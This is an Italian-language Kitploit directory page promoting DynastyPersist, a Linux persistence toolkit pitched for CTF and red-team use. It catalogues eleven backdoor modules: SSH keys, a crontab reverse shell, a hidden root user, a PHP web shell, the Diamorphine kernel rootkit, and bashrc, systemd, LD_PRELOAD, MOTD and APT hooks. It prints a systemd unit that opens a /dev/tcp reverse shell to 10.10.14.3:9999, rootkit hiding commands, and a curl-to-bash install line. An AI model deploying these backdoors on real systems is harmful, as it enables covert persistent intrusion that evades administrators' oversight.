Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DynastyPersist — Toolkit di persistenza per Linux con 11 moduli per backdoor di chiavi SSH, cronjob, servizi systemd, rootkit LKM ed escalation dei privilegi LD_PRELOAD. Progettato per competizioni CTF e operazioni di red team. | Kitploit
Strumenti/GitHubGitHub/trevohack/dynastypersist
Escalation di PrivilegiMeccanismi di PersistenzaPost-ExploitCTFPenetration TestingRed Teaming
GitHubtrevohack/dynastypersist

DynastyPersist

Toolkit di persistenza per Linux con 11 moduli per backdoor di chiavi SSH, cronjob, servizi systemd, rootkit LKM ed escalation dei privilegi LD_PRELOAD. Progettato per competizioni CTF e operazioni di red team.

Vedi Repository
1622111 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DynastyPersist 1.5

DynastyPersist: uno strumento semplificato per ottenere la persistenza su Linux senza sforzo.
Supporta KoTH, Battlegrounds e operazioni di pentest

GitHub License GitHub Repo stars Static Badge

Installazione • Documentazione • Utilizzo

image

Documentazione

[ FUNZIONALITÀ ]

[ MODULI ]

Generazione di chiavi SSH

  • Ottieni accesso a un server utilizzando la generazione di chiavi ssh. Questo modulo crea una chiave id_rsa per ogni utente. Può essere utilizzata per accesso inverso. Dopo aver eseguito questo modulo, l'attaccante può connettersi al server tramite ssh.

  • Questo può essere fatto manualmente usando il comando ssh-keygen. Tuttavia, il modulo crea una chiave privata per ogni utente in pochissimo tempo.

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • Numero del modulo: 1

Persistenza tramite Cronjob

  • I cronjob in Linux sono attività programmate che vengono eseguite automaticamente a intervalli specificati.

  • Uno dei moduli più efficienti, che coinvolge reverse shell. Questo modulo scrive direttamente comandi di reverse shell in /etc/crontab. Che farà apparire una shell sulla porta in cui stai ascoltando.

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Numero del modulo: 2

Utente personalizzato con privilegi di root

  • Un metodo semplice e veloce per ottenere accesso inverso. Semplicemente, questo modulo crea un altro utente con accesso root. Successivamente, l'attaccante può accedere all'utente tramite ssh.
root@kitploit:~
root@kali ~ ssh [email protected]
  • Numero del modulo: 3

Persistenza RCE

  • Questo modulo viene fornito con uno script php che è ospitato nella directory root del web. Lo script si trova in /var/www/html/dynasty_rce/rce.php. Inoltre, il prefisso dynasty_rce può essere nascosto se il modulo LKM viene eseguito prima.

  • Visitando victim_ip:port/dynasty_rce/rce.php ti darà il potere di eseguire comandi all'interno della shell.

  • Numero del modulo: 4

Rootkit LKM

  • Un metodo di persistenza avanzato, che impianta un rootkit nel kernel del server. Il programma si concentra su un rootkit LKM open-source chiamato Diamorphine. Il modulo si trova in /var/tmp/.memory come posizione temporanea. Questa directory viene eliminata dopo che il modulo è stato impostato.
  • Il blocco di codice seguente mostra gli usi di questo modulo.
root@kitploit:~
victim@ubuntu ~ kill -64 0 # Promtes to root user. 
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself 
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output
  • Numero del modulo: 5

Persistenza tramite Bashrc

  • Questo modulo scrive comandi di reverse shell, alias e variabili per accesso inverso. Una shell viene concessa quando un utente accede al server o quando la persona usa find o cat.
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Numero del modulo: 6

Servizio Systemd per Root

  • Un modulo che crea un servizio personalizzato in systemd per accesso inverso.

  • Un esempio:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • L'esempio sopra verrà creato come servizio. Questo metodo è efficiente e durevole.

  • Numero del modulo: 7

Configurazione LD_PRELOAD per escalation dei privilegi

  • LD_PRELOAD è una variabile d'ambiente in Linux che consente agli utenti di pre-caricare una libreria condivisa prima di altre librerie. L'escalation dei privilegi utilizzando LD_PRELOAD prevede il caricamento di una libreria dannosa per intercettare e modificare le chiamate di sistema, ottenendo potenzialmente privilegi elevati. Il modulo inserisce backdoor in comandi come find e wget.

  • Numero del modulo: 8

Backdoor nel Message of the Day / Header

  • Il "Message of the Day" (MOTD) in Linux è un testo personalizzabile visualizzato agli utenti al momento dell'accesso, che fornisce informazioni o aggiornamenti sul sistema. Di solito è memorizzato nel file /etc/motd e può essere modificato dagli amministratori di sistema.

  • Questo modulo scrive una shell in /etc/update-motd.d/00-header. Questo viene tipicamente attivato quando un utente accede.

  • Numero del modulo: 9

Modificare un servizio Systemd esistente

  • Simile al modulo 7, questo modifica un servizio esistente per accesso inverso.

  • Semplicemente, riscrive ExecStartPre nel servizio con un comando di reverse shell.

  • Numero del modulo: 10

Backdoor in APT

  • "APT" sta per Advanced Package Tool, ed è comunemente usato in sistemi basati su Debian come Ubuntu. Il file sarà qui: /etc/apt/apt.conf.d/42backdoor

  • Inserisce backdoor nel comando apt, ogni volta che apt viene eseguito, farà apparire una shell.

  • Numero del modulo: 11

[ MODALITÀ ]

  • Attualmente, sono disponibili 2 modalità nell'ultimo aggiornamento (1.4).

  • Le modalità sono console e ctf, progettate per funzionare con un comportamento specifico.

  • In confronto, la modalità console offre più funzionalità e stabilità rispetto alla modalità ctf.

Console

  • La modalità console avvia lo strumento nella configurazione abituale, con tutte le funzionalità. Queste funzionalità verranno eseguite localmente sull'host locale dove viene eseguito lo script. Progettata per la persistenza in operazioni in tempo reale.

  • Il prefisso use seguito dal numero del modulo verrà utilizzato per eseguire qualsiasi modulo selezionato. Ad esempio, use 1

  • Inoltre, l'interfaccia è aggiornata: i moduli/payload sono ora visibili quando si digita show payloads.

  • Infine, il menu di aiuto/opzioni è stato modificato: inserisci show options per visualizzarlo.

CTF

  • La modalità ctf è una funzionalità aggiuntiva per accedere a un server compromesso tramite SSH e ottenere persistenza. Questo addon sarà di grande aiuto in KoTH o Battlegrounds. Inoltre, farà risparmiare molto tempo per configurare la persistenza.

  • Esegue la maggior parte delle funzioni di console.

[ UTILIZZO ]

  • La sintassi per utilizzare lo strumento è descritta di seguito:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

Installazione

Tramite Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Tramite Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Grazie!

Scarica lo strumento
FunzionalitàDescrizione
Generazione di chiavi SSHGenera automaticamente chiavi SSH per accesso occulto.
Persistenza tramite CronjobImposta cronjob per persistenza programmata.
Utente personalizzato con privilegi di rootCrea un utente personalizzato con privilegi di root.
Persistenza RCEOttiene persistenza tramite esecuzione di codice remoto.
LKM/RootkitDimostra persistenza basata su rootkit tramite modulo del kernel Linux (LKM).
Persistenza tramite BashrcModifica i file di inizializzazione della shell specifici dell'utente per persistenza (alias / reverse shell).
Servizio Systemd per RootImposta un servizio systemd per ottenere persistenza come root.
Configurazione LD_PRELOAD per escalation dei privilegiConfigura LD_PRELOAD per escalation dei privilegi.
Backdoor nel Message of the Day / HeaderInserisce backdoor nella visualizzazione del messaggio di sistema per accesso occulto.
Modificare un servizio Systemd esistenteManipola un servizio systemd esistente per persistenza.
Backdoor nel comando APTInserisce backdoor nel comando apt per ottenere una shell.